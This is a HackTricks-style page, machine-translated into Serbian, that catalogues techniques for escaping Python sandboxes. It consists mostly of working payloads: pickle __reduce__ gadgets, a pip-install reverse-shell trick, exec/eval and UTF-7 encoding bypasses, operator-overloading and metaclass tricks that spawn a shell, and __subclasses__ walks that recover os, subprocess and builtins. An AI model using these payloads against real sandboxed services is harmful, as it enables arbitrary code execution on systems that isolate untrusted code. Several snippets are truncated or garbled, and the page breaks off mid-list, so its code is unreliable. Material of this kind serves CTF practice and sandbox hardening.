Bypass Python sandboxes

Support HackTricks

Ovo su neki trikovi za zaobilaženje zaštite python sandboksa i izvršavanje proizvoljnih komandi.

Biblioteke za izvršavanje komandi

Prva stvar koju treba da znate je da li možete direktno izvršiti kod sa nekom već uvezenom bibliotekom, ili ako možete uvesti neku od ovih biblioteka:

commands.getstatus("file/path")"ls", shell=True)
subprocess.Popen("ls", shell=True)

#Import functions to execute commands
import os
from os import *

#Other interesting functions
open('/var/www/html/input', 'w').write('123')

#In Python2.7

Zapamtite da funkcije open i read mogu biti korisne za čitati fajlove unutar python sandboksa i za pisanje nekog koda koji možete izvršiti da obiđete sandbox.

Python2 input() funkcija omogućava izvršavanje python koda pre nego što program sruši.

Python pokušava da učita biblioteke iz trenutnog direktorijuma prvo (sledeća komanda će odštampati odakle python učitava module): python3 -c 'import sys; print(sys.path)'

Obilaženje pickle sandboksa sa podrazumevano instaliranim python paketima

Podrazumevani paketi

Možete pronaći listu unapred instaliranih paketa ovde: Imajte na umu da iz picklea možete učiniti da python okruženje uvozi proizvoljne biblioteke instalirane u sistemu. Na primer, sledeći pickle, kada se učita, će uvesti pip biblioteku da je koristi:

#Note that here we are importing the pip library so the pickle is created correctly
#however, the victim doesn't even need to have the library installed to execute it
#the library is going to be loaded automatically

import pickle, os, base64, pip
class P(object):
def __reduce__(self):
return (pip.main,(["list"],))

print(base64.b64encode(pickle.dumps(P(), protocol=0)))

Za više informacija o tome kako pickle funkcioniše, proverite ovo:

Pip paket

Trik koji je podelio @isHaacK

Ako imate pristup pip ili pip.main(), možete instalirati proizvoljan paket i dobiti reverznu ljusku pozivajući:

pip install
pip.main(["install", ""])

Možete preuzeti paket za kreiranje reverzne ljuske ovde. Molimo vas da napomenete da pre korišćenja treba dekompresovati, promeniti i staviti vašu IP adresu za reverznu ljusku:

Ovaj paket se zove Reverse. Međutim, posebno je napravljen tako da kada napustite reverznu ljusku, ostatak instalacije neće uspeti, tako da nećete ostaviti nijedan dodatni python paket instaliran na serveru kada odete.

Eval-ovanje python koda

Napomena da exec omogućava višelinijske stringove i ";", ali eval ne (proverite operator vidre)

Ako su određeni karakteri zabranjeni, možete koristiti hex/octal/B64 reprezentaciju da zaobiđete ograničenje:

exec("print('RCE'); __import__('os').system('ls')") #Using ";"
exec("print('RCE')\n__import__('os').system('ls')") #Using "\n"
eval("__import__('os').system('ls')") #Eval doesn't allow ";"
eval(compile('print("hello world"); print("heyy")', '<stdin>', 'exec')) #This way eval accept ";"
#One liners that allow new lines and tabs
eval(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '<stdin>', 'exec'))
exec(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '<stdin>', 'exec'))
exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2

Druge biblioteke koje omogućavaju eval python koda

import pandas as pd
df = pd.read_csv("currency-rates.csv")

# The previous options work but others you might try give the error:
# Only named functions are supported
# Like:

Оператори и кратки трикови

# walrus operator allows generating variable inside a list
## everything will be executed in order
## From
[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]
## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"

Bypassing protections through encodings (UTF-7)

U ovoj analizi UFT-7 se koristi za učitavanje i izvršavanje proizvoljnog python koda unutar naizgled sandboks okruženja:

assert b"+AAo-".decode("utf_7") == "\n"

payload = """
# -*- coding: utf_7 -*-
def f(x):
return x

Takođe je moguće zaobići to koristeći druge kodiranja, npr. raw_unicode_escape i unicode_escape.

Python izvršavanje bez poziva

Ako ste unutar python zatvora koji ne dozvoljava pozive, još uvek postoje neki načini da izvršite proizvoljne funkcije, kod i komande.

# From
class X:

# The previous code is equivalent to:
class X:
X = input(X)
X = exec(X)

# So just send your python code when prompted and it will be executed

# Another approach without calling input:
class _:pass

RCE kreiranje objekata i preopterećenje

Ako možete deklarisati klasu i napraviti objekat te klase, mogli biste pisati/prepisivati različite metode koje mogu biti pokrenute bez potrebe da ih direktno pozivate.

RCE sa prilagođenim klasama

Možete modifikovati neke metode klase (prepisivanjem postojećih metoda klase ili kreiranjem nove klase) da izvršavaju arbitrarni kod kada su pokrenute bez direktnog pozivanja.

# This class has 3 different ways to trigger RCE without directly calling any function
class RCE:
def __init__(self):
self += "print('Hello from __init__ + __iadd__')"
__iadd__ = exec #Triggered when object is created
def __del__(self):
self -= "print('Hello from __del__ + __isub__')"
__isub__ = exec #Triggered when object is created
__getitem__ = exec #Trigerred with obj[<argument>]
__add__ = exec #Triggered with obj + <argument>

# These lines abuse directly the previous class to get RCE
rce = RCE() #Later we will see how to create objects without calling the constructor
rce["print('Hello from __getitem__')"]
rce + "print('Hello from __add__')"
del rce

# These lines will get RCE when the program is over (exit)
sys.modules["pwnd"] = RCE()

# Other functions to overwrite
__sub__ (k - 'import os; os.system("sh")')
__mul__ (k * 'import os; os.system("sh")')
__floordiv__ (k // 'import os; os.system("sh")')
__truediv__ (k / 'import os; os.system("sh")')
__mod__ (k % 'import os; os.system("sh")')
__pow__ (k**'import os; os.system("sh")')
__lt__ (k < 'import os; os.system("sh")')
__le__ (k <= 'import os; os.system("sh")')
__eq__ (k == 'import os; os.system("sh")')
__ne__ (k != 'import os; os.system("sh")')
__ge__ (k >= 'import os; os.system("sh")')
__gt__ (k > 'import os; os.system("sh")')
__iadd__ (k += 'import os; os.system("sh")')
__isub__ (k -= 'import os; os.system("sh")')
__imul__ (k *= 'import os; os.system("sh")')
__ifloordiv__ (k //= 'import os; os.system("sh")')
__idiv__ (k /= 'import os; os.system("sh")')
__itruediv__ (k /= 'import os; os.system("sh")') (Note that this only works when from __future__ import division is in effect.)
__imod__ (k %= 'import os; os.system("sh")')
__ipow__ (k **= 'import os; os.system("sh")')
__ilshift__ (k<<= 'import os; os.system("sh")')
__irshift__ (k >>= 'import os; os.system("sh")')
__iand__ (k = 'import os; os.system("sh")')
__ior__ (k |= 'import os; os.system("sh")')
__ixor__ (k ^= 'import os; os.system("sh")')

Kreiranje objekata sa metaklasama

Ključna stvar koju metaklase omogućavaju je da napravimo instancu klase, bez direktnog pozivanja konstruktora, kreiranjem nove klase sa ciljanom klasom kao metaklasom.

# Code from and fixed
# This will define the members of the "subclass"
class Metaclass(type):
__getitem__ = exec # So Sub[string] will execute exec(string)
# Note: Metaclass.__class__ == type

class Sub(metaclass=Metaclass): # That's how we make Sub.__class__ == Metaclass
pass # Nothing special to do

Sub['import os; os.system("sh")']

## You can also use the tricks from the previous section to get RCE with this object

Kreiranje objekata sa izuzecima

Kada se izuzetak aktivira, objekat Exception se kreira bez potrebe da direktno pozivate konstruktor (trik od @_nag0mez):

class RCE(Exception):
def __init__(self):
self += 'import os; os.system("sh")'
__iadd__ = exec #Triggered when object is created
raise RCE #Generate RCE object

# RCE with __add__ overloading and try/except + raise generated object
class Klecko(Exception):
__add__ = exec

raise Klecko
except Klecko as k:
k + 'import os; os.system("sh")' #RCE abusing __add__

## You can also use the tricks from the previous section to get RCE with this object

Više RCE

# From
# If sys is imported, you can sys.excepthook and trigger it by triggering an error
class X:
def __init__(self, a, b, c):
self += "os.system('sh')"
__iadd__ = exec
sys.excepthook = X
1/0 #Trigger it

# From
# The interpreter will try to import an apt-specific module to potentially
# report an error in ubuntu-provided modules.
# Therefore the __import__ functions are overwritten with our RCE
class X():
def __init__(self, a, b, c, d, e):
self += "print(open('flag').read())"
__iadd__ = eval
__builtins__.__import__ = X

Pročitajte datoteku sa pomoćnim funkcijama i licencom

a =
a.__class__.__enter__ = __builtins__.__dict__["license"]
a.__class__.__exit__ = lambda self, *args: None
with (a as b):


Ako možete pristupiti __builtins__ objektu, možete uvesti biblioteke (primetite da ovde možete koristiti i druge string reprezentacije prikazane u poslednjem odeljku):


No Builtins

Kada nemate __builtins__, nećete moći da uvezete ništa niti čak da čitate ili pišete fajlove jer sve globalne funkcije (kao što su open, import, print...) nisu učitane. Međutim, po defaultu, python učitava mnogo modula u memoriju. Ovi moduli mogu delovati benigno, ali neki od njih takođe uvoze opasne funkcionalnosti unutar sebe koje se mogu iskoristiti za dobijanje čak i arbitrary code execution.

U sledećim primerima možete posmatrati kako da zloupotrebite neke od ovih "benignih" modula učitanih da pristupite opasnim funkcionalnostima unutar njih.


#Try to reload __builtins__
import __builtin__

# Read recovering <type 'file'> in offset 40
# Write recovering <type 'file'> in offset 40
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')

# Execute recovering __import__ (class 59s is <class 'warnings.catch_warnings'>)
# Execute (another method)
# Execute recovering eval symbol (class 59 is <class 'warnings.catch_warnings'>)

# Or you could obtain the builtins from a defined function


# Obtain builtins from a globally defined function
help.__call__.__builtins__ # or __globals__
license.__call__.__builtins__ # or __globals__
credits.__call__.__builtins__ # or __globals__

# Obtain the builtins from a defined function

# Get builtins from loaded classes
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]

Ispod se nalazi veća funkcija za pronalaženje desetina/stotina mesta gde možete pronaći builtins.

Python2 i Python3

# Recover __builtins__ and make everything easier
__builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__

Ugrađeni payloads

Globals and locals

Proveravanje globals i locals je dobar način da saznate šta možete da pristupite.

>>> globals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, 'attr': <module 'attr' from '/usr/local/lib/python3.9/site-packages/'>, 'a': <class ''>, 'b': <class ''>, 'c': <class 'str'>, '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', <class 'DeprecationWarning'>, 1): True}, 'z': <class 'str'>}
>>> locals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, 'attr': <module 'attr' from '/usr/local/lib/python3.9/site-packages/'>, 'a': <class ''>, 'b': <class ''>, 'c': <class 'str'>, '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', <class 'DeprecationWarning'>, 1): True}, 'z': <class 'str'>}

# Obtain globals from a defined function

# Obtain globals from an object of a class

# Obtaining globals directly from loaded classes
[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x) ]
[<class 'function'>]

# Obtaining globals from __init__ of loaded classes
[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x.__init__) ]
[<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]
# Without the use of the dir() function
[ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)]
[<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]

Ispod se nalazi veća funkcija za pronalaženje desetina/stotina mesta gde možete pronaći globals.

Otkrijte proizvoljnu izvršavanje

Ovde želim da objasnim kako lako otkriti opasnije funkcionalnosti koje su učitane i predložiti pouzdanije eksploate.

Pristupanje podklasama sa zaobilaženjima

Jedan od najosetljivijih delova ove tehnike je mogućnost pristupa osnovnim podklasama. U prethodnim primerima to je učinjeno korišćenjem ''.__class__.__base__.__subclasses__() ali postoje drugi mogući načini:

#You can access the base from mostly anywhere (in regular conditions)

#You can also access it without "__base__" or "__class__"
# You can apply the previous technique also here

# This can be useful in case it is not possible to make calls (therefore using decorators)
().__class__.__class__.__subclasses__(().__class__.__class__)[0].register.__builtins__["breakpoint"]() # From

#If attr is present you can access everything as a string
# This is common in Django (and Jinja) environments

Pronalaženje opasnih učitanih biblioteka

Na primer, znajući da sa bibliotekom sys može da se uvezete proizvoljne biblioteke, možete pretražiti sve module koji su učitani i koji imaju uvezen sys unutar njih:

[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ]
['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']

Postoji mnogo, i samo nam je jedan potreban da izvršimo komande:

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")

Možemo uraditi istu stvar sa drugim bibliotekama za koje znamo da se mogu koristiti za izvršavanje komandi:

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" == x.__init__.__globals__["__name__"] ][0]["system"]("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "subprocess" == x.__init__.__globals__["__name__"] ][0]["Popen"]("ls")
[ x for x in ''.__class__.__base__.__subclasses__() if "'subprocess." in str(x) ][0]['Popen']('ls')
[ x for x in ''.__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0]('ls')

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "__bultins__" in x.__init__.__globals__ ]
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"].__import__("os").system("ls")

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"].system("ls")

#commands (not very common)
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "commands" in x.__init__.__globals__ ][0]["commands"].getoutput("ls")

#pty (not very common)
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pty" in x.__init__.__globals__ ][0]["pty"].spawn("ls")

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].import_module("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].__import__("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].import_module("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].__import__("os").system("ls")

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pdb" in x.__init__.__globals__ ][0]["pdb"].os.system("ls")

Pored toga, mogli bismo čak da pretražimo koji moduli učitavaju zlonamerne biblioteke:

bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
for b in bad_libraries_names:
vuln_libs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and b in x.__init__.__globals__ ]
print(f"{b}: {', '.join(vuln_libs)}")

os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
subprocess: BaseDependency, Origin, Version, Package
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature

Pored toga, ako mislite da druge biblioteke mogu pozvati funkcije za izvršavanje komandi, možemo takođe filtrirati po imenima funkcija unutar mogućih biblioteka:

bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]
for b in bad_libraries_names + bad_func_names:
vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ]
print(f"{b}: {', '.join(vuln_funcs)}")

os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
subprocess: BaseDependency, Origin, Version, Package
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature
system: _wrap_close, _wrap_close
getstatusoutput: CompletedProcess, Popen
getoutput: CompletedProcess, Popen
call: CompletedProcess, Popen
Popen: CompletedProcess, Popen
__import__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec
load_source: NullImporter, _HackedGetData
__builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, 